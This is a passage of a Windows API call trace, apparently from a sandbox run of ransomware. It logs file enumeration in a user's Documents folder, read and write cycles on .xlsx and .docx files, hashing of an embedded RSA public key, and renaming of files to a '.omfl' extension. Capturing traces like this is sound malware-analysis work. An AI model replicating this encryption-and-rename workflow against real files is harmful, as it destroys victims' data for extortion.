hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16e90 | out: hHeap=0x4970000) returned 1 [0131.003] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16ea8 | out: hHeap=0x4970000) returned 1 [0131.003] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0131.003] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0131.003] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0131.003] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16848 [0131.003] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e38 [0131.003] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16ea8 [0131.003] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf068 [0131.003] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd16e90 [0131.003] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0131.003] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0131.003] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0131.003] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08ea8 [0131.003] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0131.003] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0131.003] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdb88 [0131.003] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0131.003] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.004] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16ea8 | out: hHeap=0x4970000) returned 1 [0131.004] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0131.004] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16e90 | out: hHeap=0x4970000) returned 1 [0131.004] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf068 | out: hHeap=0x4970000) returned 1 [0131.004] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0131.004] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0131.004] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0131.004] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08cc8 | out: hHeap=0x4970000) returned 1 [0131.004] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd20488 | out: hHeap=0x4970000) returned 1 [0131.004] GetCurrentThreadId () returned 0x618 [0131.004] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0131.004] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0xdd2c8e0 [0131.005] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x10907, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.005] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.005] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0131.005] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.005] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.005] CloseHandle (hObject=0x5c8) returned 1 [0131.007] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\P6OydQcGCqGw2QEx.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\p6oydqcgcqgw2qex.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\P6OydQcGCqGw2QEx.xlsx.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\p6oydqcgcqgw2qex.xlsx.omfl")) returned 1 [0131.008] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0131.008] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0131.008] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.010] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd14728 | out: hHeap=0x4970000) returned 1 [0131.010] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc98386a0, ftCreationTime.dwHighDateTime=0x1d57eb8, ftLastAccessTime.dwLowDateTime=0xdbf63450, ftLastAccessTime.dwHighDateTime=0x1d5d6c3, ftLastWriteTime.dwLowDateTime=0xdbf63450, ftLastWriteTime.dwHighDateTime=0x1d5d6c3, nFileSizeHigh=0x0, nFileSizeLow=0x12e75, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PMgb9ZlI2eeQA.docx", cAlternateFileName="PMGB9Z~1.DOC")) returned 1 [0131.010] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PMgb9ZlI2eeQA.docx") returned=".docx" [0131.010] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PMgb9ZlI2eeQA.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pmgb9zli2eeqa.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0131.010] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=77429) returned 1 [0131.010] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.013] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x12e4f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.014] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.015] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x12e75, lpOverlapped=0x0) returned 1 [0131.015] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.016] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.016] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.016] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0131.017] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.017] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.017] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.017] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0131.017] GetLastError () returned 0x0 [0131.017] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0131.017] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0131.017] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0131.017] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.017] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.017] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.017] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0131.018] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd20488 [0131.018] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0131.018] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16ea8 | out: hHeap=0x4970000) returned 1 [0131.018] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16ec0 | out: hHeap=0x4970000) returned 1 [0131.018] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0131.018] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0131.018] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0131.018] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0131.018] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e58 [0131.018] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16ec0 [0131.018] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdb88 [0131.018] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd16ea8 [0131.018] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0131.018] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0131.018] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0131.018] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0131.019] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0131.019] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0131.019] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf068 [0131.019] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0131.019] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.019] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16ec0 | out: hHeap=0x4970000) returned 1 [0131.019] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0131.019] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16ea8 | out: hHeap=0x4970000) returned 1 [0131.019] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdb88 | out: hHeap=0x4970000) returned 1 [0131.019] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0131.019] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0131.019] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0131.019] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08ea8 | out: hHeap=0x4970000) returned 1 [0131.019] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd20488 | out: hHeap=0x4970000) returned 1 [0131.019] GetCurrentThreadId () returned 0x618 [0131.019] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0131.019] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0xdd2c970 [0131.019] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750cb28 [0131.019] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3088 [0131.019] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0131.019] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0131.019] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0131.019] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24890 [0131.019] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.019] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.019] GetCurrentThreadId () returned 0x618 [0131.019] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.020] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0131.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.020] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.020] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.020] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0131.020] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0131.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757ca08 [0131.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0131.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24788 [0131.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0131.020] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0131.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0131.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0131.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0131.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0131.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0131.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16ea8 [0131.020] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0131.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa8b0 [0131.020] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0131.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa900 [0131.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0131.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16ec0 [0131.021] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa900 | out: hHeap=0x4970000) returned 1 [0131.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdb88 [0131.021] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0131.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16e90 [0131.021] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0131.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16a40 [0131.021] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e98 [0131.021] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0131.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16848 [0131.021] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd167e8 [0131.021] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0131.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16ed8 [0131.021] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0131.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16848 [0131.021] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd167e8 | out: hHeap=0x4970000) returned 1 [0131.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa8a0 [0131.021] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0131.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf128 [0131.021] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0131.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c) returned 0xdce9278 [0131.021] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16ea8 | out: hHeap=0x4970000) returned 1 [0131.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16ea8 [0131.021] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0131.022] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x204) returned 0xdd20488 [0131.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0131.022] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x75038a0 [0131.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0131.022] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x210) returned 0xdce0a50 [0131.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0131.022] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10c) returned 0x74e3210 [0131.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8c0 | out: hHeap=0x4970000) returned 1 [0131.022] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x7503788 [0131.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16ea8 | out: hHeap=0x4970000) returned 1 [0131.022] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x200) returned 0xdcfc0b8 [0131.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75038a0 | out: hHeap=0x4970000) returned 1 [0131.022] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0131.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0131.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3088 | out: hHeap=0x4970000) returned 1 [0131.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24578 | out: hHeap=0x4970000) returned 1 [0131.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24368 | out: hHeap=0x4970000) returned 1 [0131.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf128 | out: hHeap=0x4970000) returned 1 [0131.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503788 | out: hHeap=0x4970000) returned 1 [0131.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0131.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfc0b8 | out: hHeap=0x4970000) returned 1 [0131.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0131.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16ed8 | out: hHeap=0x4970000) returned 1 [0131.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0131.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0131.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdb88 | out: hHeap=0x4970000) returned 1 [0131.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16ec0 | out: hHeap=0x4970000) returned 1 [0131.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16e90 | out: hHeap=0x4970000) returned 1 [0131.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17560 | out: hHeap=0x4970000) returned 1 [0131.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0131.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24890 | out: hHeap=0x4970000) returned 1 [0131.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16e78 | out: hHeap=0x4970000) returned 1 [0131.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd34788 | out: hHeap=0x4970000) returned 1 [0131.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd20488 | out: hHeap=0x4970000) returned 1 [0131.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24788 | out: hHeap=0x4970000) returned 1 [0131.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757ca08 | out: hHeap=0x4970000) returned 1 [0131.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503670 | out: hHeap=0x4970000) returned 1 [0131.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdf28 | out: hHeap=0x4970000) returned 1 [0131.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0131.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf068 | out: hHeap=0x4970000) returned 1 [0131.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08cc8 | out: 